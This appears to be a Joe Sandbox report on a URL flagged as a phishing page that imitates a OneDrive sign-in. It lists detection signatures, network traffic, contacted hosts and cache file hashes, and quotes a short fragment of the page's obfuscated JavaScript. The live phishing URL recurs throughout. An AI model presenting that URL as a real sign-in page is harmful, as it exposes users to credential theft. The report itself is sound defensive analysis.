Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://scales.mn/file/one-drv11.html

Overview

General Information

Sample URL:	https://scales.mn/file/one-drv11.html
Analysis ID:	1584929
Infos:

Detection

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Antivirus / Scanner detection for submitted sample

HTML page contains obfuscated javascript

HTML body contains low number of good links

HTML body contains password input but no form action

HTML title does not match URL

Invalid 'forgot password' link found

Classification

×

Process Tree

System is w10x64

chrome.exe (PID: 2332 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 3484 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 --field-trial-handle=2356,i,4760404988359330048,10640296154524373879,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6492 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://scales.mn/file/one-drv11.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

⊘No yara matches

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: https://scales.mn/file/one-drv11.html

Avira URL Cloud: detection malicious, Label: phishing

Phishing

AI detected phishing page

Source: https://scales.mn/file/one-drv11.html

Joe Sandbox AI: Score: 7 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The URL 'scales.mn' does not match the legitimate domain for Microsoft., The domain 'scales.mn' does not contain any recognizable association with Microsoft., The use of a generic domain with no clear link to the brand is a common phishing tactic., The presence of input fields for 'Email' and 'Password' on an unrelated domain increases suspicion. DOM: 1.0.pages.csv

HTML page contains obfuscated javascript

Source: https://scales.mn/file/one-drv11.html	HTTP Parser: (function(_0x5bf56e,_0x4d3fb4){const _0x2aa6da={_0xe1ea9e:0x123,_0x69dfa3:0x11f,_0x4f9bb6:0x127,_
Source: https://scales.mn/file/one-drv11.html	HTTP Parser: (function(_0x5bf56e,_0x4d3fb4){const _0x2aa6da={_0xe1ea9e:0x123,_0x69dfa3:0x11f,_0x4f9bb6:0x127,_

Source: https://scales.mn/file/one-drv11.html

HTTP Parser: Number of links: 0

Source: https://scales.mn/file/one-drv11.html

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: https://scales.mn/file/one-drv11.html

HTTP Parser: Title: OneDrive Sign In does not match URL

Source: https://scales.mn/file/one-drv11.html

HTTP Parser: Invalid link: Forgot password?

Source: https://scales.mn/file/one-drv11.html

HTTP Parser: <input type="password" .../> found

Source: https://scales.mn/file/one-drv11.html

HTTP Parser: No favicon

Source: https://scales.mn/file/one-drv11.html

HTTP Parser: No <meta name="author".. found

Source: https://scales.mn/file/one-drv11.html

HTTP Parser: No <meta name="copyright".. found

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /file/one-drv11.html HTTP/1.1Host: scales.mnConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/font-awesome/5.15.3/css/all.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://scales.mn/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/font-awesome/5.15.3/webfonts/fa-solid-900.woff2 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://scales.mnsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: scales.mnConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://scales.mn/file/one-drv11.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: scales.mn
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com

Source: chromecache_49.1.dr	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css
Source: chromecache_50.1.dr	String found in binary or memory: https://fontawesome.com
Source: chromecache_50.1.dr	String found in binary or memory: https://fontawesome.com/license/free
Source: chromecache_49.1.dr	String found in binary or memory: https://logincdn.msauth.net/shared/5/images/microsoft_logo_ee5c8d9fb6248c938fd0.svg
Source: chromecache_49.1.dr	String found in binary or memory: https://storage.googleapis.com/a1aa/image/MKiqWrWWQ2LoMtdh3jpT9IeVdRKLH07CvHZLmGUeCw0WKnyTA.jpg

Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: classification engine

Classification label: mal60.phis.win@16/16@6/5

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 --field-trial-handle=2356,i,4760404988359330048,10640296154524373879,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://scales.mn/file/one-drv11.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 --field-trial-handle=2356,i,4760404988359330048,10640296154524373879,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
https://scales.mn/file/one-drv11.html	100%	Avira URL Cloud	phishing

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://scales.mn/favicon.ico	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cdnjs.cloudflare.com	104.17.25.14	true	false		high
scales.mn	43.231.112.47	true	true		unknown
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false		high
www.google.com	142.250.185.196	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css	false		high
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/webfonts/fa-solid-900.woff2	false		high
https://scales.mn/favicon.ico	false	Avira URL Cloud: safe	unknown
https://scales.mn/file/one-drv11.html	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://fontawesome.com	chromecache_50.1.dr	false		high
https://fontawesome.com/license/free	chromecache_50.1.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
239.255.255.250	unknown	Reserved		unknown	unknown	false
142.250.185.196	www.google.com	United States		15169	GOOGLEUS	false
104.17.25.14	cdnjs.cloudflare.com	United States		13335	CLOUDFLARENETUS	false
43.231.112.47	scales.mn	Mongolia		63962	ITOOLS-ASiToolsJSCMN	true

Private

IP
192.168.2.4

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1584929
Start date and time:	2025-01-06 19:22:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 2m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://scales.mn/file/one-drv11.html
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal60.phis.win@16/16@6/5
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.186.67, 172.217.16.142, 142.251.173.84, 216.58.206.78, 142.250.186.46, 142.250.185.155, 172.217.23.123, 142.250.185.123, 216.58.206.59, 216.58.212.187, 142.250.185.251, 142.250.185.91, 142.250.186.91, 216.58.206.91, 142.250.184.251, 142.250.181.251, 142.250.186.187, 142.250.184.219, 142.250.185.187, 142.250.185.219, 216.58.212.155, 142.250.186.74, 172.217.16.202, 142.250.186.42, 142.250.185.234, 142.250.181.234, 172.217.16.138, 142.250.185.106, 142.250.185.170, 142.250.186.106, 216.58.206.42, 142.250.185.138, 142.250.186.138, 142.250.185.202, 142.250.184.202, 172.217.18.10, 142.250.186.170, 172.217.16.219, 172.217.18.123, 142.250.186.123, 142.250.186.59, 172.217.18.27, 142.250.74.219, 142.250.186.155, 172.217.16.155, 199.232.214.172, 192.229.221.95, 142.250.186.174, 172.217.18.14, 142.250.184.238, 142.250.184.206, 142.250.184.227, 142.250.185.142, 172.217.16.206, 23.56.254.164, 13.107.246.45, 52.149.20.212
Excluded domains from analysis (whitelisted): logincdn.msauth.net, fs.microsoft.com, lgincdnmsftuswe2.azureedge.net, accounts.google.com, storage.googleapis.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, lgincdnmsftuswe2.afd.azureedge.net, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: https://scales.mn/file/one-drv11.html

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

Chrome Cache Entry: 44

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
Category:	dropped
Size (bytes):	1435
Entropy (8bit):	7.8613342322590265
Encrypted:	false
SSDEEP:	24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
MD5:	9F368BC4580FED907775F31C6B26D6CF
SHA1:	E393A40B3E337F43057EEE3DE189F197AB056451
SHA-256:	7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
SHA-512:	0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
Malicious:	false
Reputation:	low
Preview:	...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.\|..~.\|{~...b{8...zv.....8\|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.\|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dgN.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f;.....Zhrr.,.U....6.Y....+Zd.R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.

Chrome Cache Entry: 45

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 78196, version 331.-31261
Category:	downloaded
Size (bytes):	78196
Entropy (8bit):	7.997039463361104
Encrypted:	true
SSDEEP:	1536:1iGQV8Q8UOUMUd5UY3qyCkHQCCz2LL1F+u3MHLGxe3U:QVWuF33qy7HQchFz8HnU
MD5:	E8A427E15CC502BEF99CFD722B37EA98
SHA1:	A9922842A120A7F1EACED667480C5E185A106D69
SHA-256:	D0B4256ABED72481585662971262EABEE345C19F837AF00D7CE24239D3B40EEF
SHA-512:	113775748A4166C07E58C26CF6DB7FED473732DC6124B8EE0F0DCC0D6439EB2AB2C5D9E01C67324FDF9DE4105349CF30CC5796A0B0E0CE9A08F337B9D4E10B7B
Malicious:	false
Reputation:	low
URL:	https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/webfonts/fa-solid-900.woff2
Preview:	wOF2......1t..........1..K......................?FFTM....`..N.....h..B.6.$..0..4.. ..+...[.u..p.(..U.d..{-.n.Pn...._=V2.e..vp.~........U..1...=..B..b....mvS....w.C.+.$...(..MMI.iH}..O...4.7.s...Y.)......}..^...{^...R.z....f..h4dD7.:1...Cj..l.8M..T...]}.]?Z..v....g.yV...^..\.?.wM\|......Ws..yf%..PL.....~.z.w.S.uQw..........EY.!.........j.O.....c...>T\|....W...Zk...9.......XJ...../I`x.R....c.h..w...?tm..l...LQ......hMg...x...1.F...cU.b\|.3....v.Kr.f.H ..9 @....... ......'..j...Vq.:.Q..+....._..(...J.....~../..Y<."......GB..:..P.B...7q...K.{...F"..3....6?.C,..B..P.V.......C.C..\....+....a...X.z..Tzdn.P.M....li...l2);.!..wX..xh.o.u!.........O.......Ew.$b7X..8d..H...s...z#d..&...J.G...Q.M.....rV?.....&....#...t]........+..............v...$X.P............ h.z.{...../F.-Y..!.a.1...&.;.^^.U.U.E....!O......./+~.........Q.\|.n@.W..P.tc.l.--....]6..........u..[.SN....i....4-......"...fC...`........@.......l=..g...-..C8...B.X.........g.~..p.1%..x.A.X..

Chrome Cache Entry: 46

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image, VP8 encoding, 1024x1024, Scaling: [none]x[none], YUV color, decoders should clamp
Category:	dropped
Size (bytes):	7482
Entropy (8bit):	7.9553316229271305
Encrypted:	false
SSDEEP:	192:72/g+PSj9Zx7uR/XP/Gj3vkSN6A6gYOKvP2+UI8bdVNfVPB:JaSBr8GLrIA6gYdcpbdVNfVPB
MD5:	E08055C051D63E82C1822F3309BB9A8D
SHA1:	7B6D0F53AFF14DA873050147C8E37C349BD49D00
SHA-256:	C0B60E63FDF4158558E4044FC8EFFCAB097FCCD1ED41543BD0C1B2F9425480D8
SHA-512:	8F30699B1570C3989E313AFD65BC2DEC1F667A0F13FFD3419933AEA6E7729759A1CA63193BDDD8610CAC17A069DF30200948C42708328DF7ACD9CA1BACF87C24
Malicious:	false
Reputation:	low
Preview:	RIFF2...WEBPVP8 &....s.......>m6.I$#..".....in.S...........s.Ut..3.-!.9..."J.A..? .........O..U.v.o.v..#.yi.....r._.g...tI..$...cn.'.p..>BT..n6..[=.Z..tK.o.J}..u&...."'...E.A..O.[d..:....!..B.I..Z......+ 9....5.OFm..s...\|.....k.K/z&.k..mz.9@.e..tI.m....=..Pn.1...u}....."/mz.H\|..@nd.....cn...{..k..^..&6...u\|.a+k...D..].b.+\.D..9\ ..}.\|#.K..]k.Lm.=._b..V...;....nW..+.D.j=y..mu..../.7..qNT.......9X_...omz.D..^H?.B5.pF[.t.._.....aR.....A.. .\|.~Y..B.lD..(e\|..\g.H....4l..;.B.}.NX.tN.......f..Z...L...O/.q....b.."u.b.W..b.V..tU.......~.^...>..4Y..0x.!..wX.V.q..4.N..'Js....e%..A..5.&4.._....o..8.......u#..!>.d.P...8t.6zZ..l.8/.4.I.s.7....^4T..."G.../..,.}ez.K.e.4ooU../. .I:....<....!..8..c...]..!?H.(d.t&.....E'.\yV.8#z..+..#D'Kh.V...5a...m.bpd.........@.By.y*.\|>.DRA#+..v....J.d...0...Y....f.#...o.-.4i....2...........a..d.2.n.$ ....1%..t.A.....T.Hlq.W.c.S~+.^!P....h..YvzEt.C...b....Ct....#.0.<?.!k..8.x..zc....Fv../.U....E..3.l.1.....D.....%.g...

Chrome Cache Entry: 47

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
Category:	downloaded
Size (bytes):	1435
Entropy (8bit):	7.8613342322590265
Encrypted:	false
SSDEEP:	24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
MD5:	9F368BC4580FED907775F31C6B26D6CF
SHA1:	E393A40B3E337F43057EEE3DE189F197AB056451
SHA-256:	7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
SHA-512:	0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
Malicious:	false
Reputation:	low
URL:	https://logincdn.msauth.net/shared/5/images/microsoft_logo_ee5c8d9fb6248c938fd0.svg
Preview:	...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.\|..~.\|{~...b{8...zv.....8\|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.\|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dgN.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f;.....Zhrr.,.U....6.Y....+Zd.R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.

Chrome Cache Entry: 48

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image, VP8 encoding, 1024x1024, Scaling: [none]x[none], YUV color, decoders should clamp
Category:	downloaded
Size (bytes):	7482
Entropy (8bit):	7.9553316229271305
Encrypted:	false
SSDEEP:	192:72/g+PSj9Zx7uR/XP/Gj3vkSN6A6gYOKvP2+UI8bdVNfVPB:JaSBr8GLrIA6gYdcpbdVNfVPB
MD5:	E08055C051D63E82C1822F3309BB9A8D
SHA1:	7B6D0F53AFF14DA873050147C8E37C349BD49D00
SHA-256:	C0B60E63FDF4158558E4044FC8EFFCAB097FCCD1ED41543BD0C1B2F9425480D8
SHA-512:	8F30699B1570C3989E313AFD65BC2DEC1F667A0F13FFD3419933AEA6E7729759A1CA63193BDDD8610CAC17A069DF30200948C42708328DF7ACD9CA1BACF87C24
Malicious:	false
Reputation:	low
URL:	https://storage.googleapis.com/a1aa/image/MKiqWrWWQ2LoMtdh3jpT9IeVdRKLH07CvHZLmGUeCw0WKnyTA.jpg
Preview:	RIFF2...WEBPVP8 &....s.......>m6.I$#..".....in.S...........s.Ut..3.-!.9..."J.A..? .........O..U.v.o.v..#.yi.....r._.g...tI..$...cn.'.p..>BT..n6..[=.Z..tK.o.J}..u&...."'...E.A..O.[d..:....!..B.I..Z......+ 9....5.OFm..s...\|.....k.K/z&.k..mz.9@.e..tI.m....=..Pn.1...u}....."/mz.H\|..@nd.....cn...{..k..^..&6...u\|.a+k...D..].b.+\.D..9\ ..}.\|#.K..]k.Lm.=._b..V...;....nW..+.D.j=y..mu..../.7..qNT.......9X_...omz.D..^H?.B5.pF[.t.._.....aR.....A.. .\|.~Y..B.lD..(e\|..\g.H....4l..;.B.}.NX.tN.......f..Z...L...O/.q....b.."u.b.W..b.V..tU.......~.^...>..4Y..0x.!..wX.V.q..4.N..'Js....e%..A..5.&4.._....o..8.......u#..!>.d.P...8t.6zZ..l.8/.4.I.s.7....^4T..."G.../..,.}ez.K.e.4ooU../. .I:....<....!..8..c...]..!?H.(d.t&.....E'.\yV.8#z..+..#D'Kh.V...5a...m.bpd.........@.By.y*.\|>.DRA#+..v....J.d...0...Y....f.#...o.-.4i....2...........a..d.2.n.$ ....1%..t.A.....T.Hlq.W.c.S~+.^!P....h..YvzEt.C...b....Ct....#.0.<?.!k..8.x..zc....Fv../.U....E..3.l.1.....D.....%.g...

Chrome Cache Entry: 49

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (57600), with CRLF line terminators
Category:	downloaded
Size (bytes):	65207
Entropy (8bit):	4.915042659692061
Encrypted:	false
SSDEEP:	1536:77ViPecf04MiqLMTVnDyjEtG6jrJt5pp9wqWj/:QPN04MiqLM5nDcEtjP5pcxj/
MD5:	91C790E036D0AD258F0312C5DCF5C26F
SHA1:	ED62261FCE74CB46623788EFB45536C86F2BC92E
SHA-256:	DF370BCA80226F0EC5C45C8661A527265BCED871D7F45D6DE45E7A6AB293C987
SHA-512:	FDE7E03C5C904390CD482509F586BC90077FFDF1217269A279519FBD1871BDB3DCFF4E0F5DAA4AAEE7B193A397BFF8FD05846E9B7F61F67B5B5F71D8F6B908FE
Malicious:	false
Reputation:	low
URL:	https://scales.mn/file/one-drv11.html
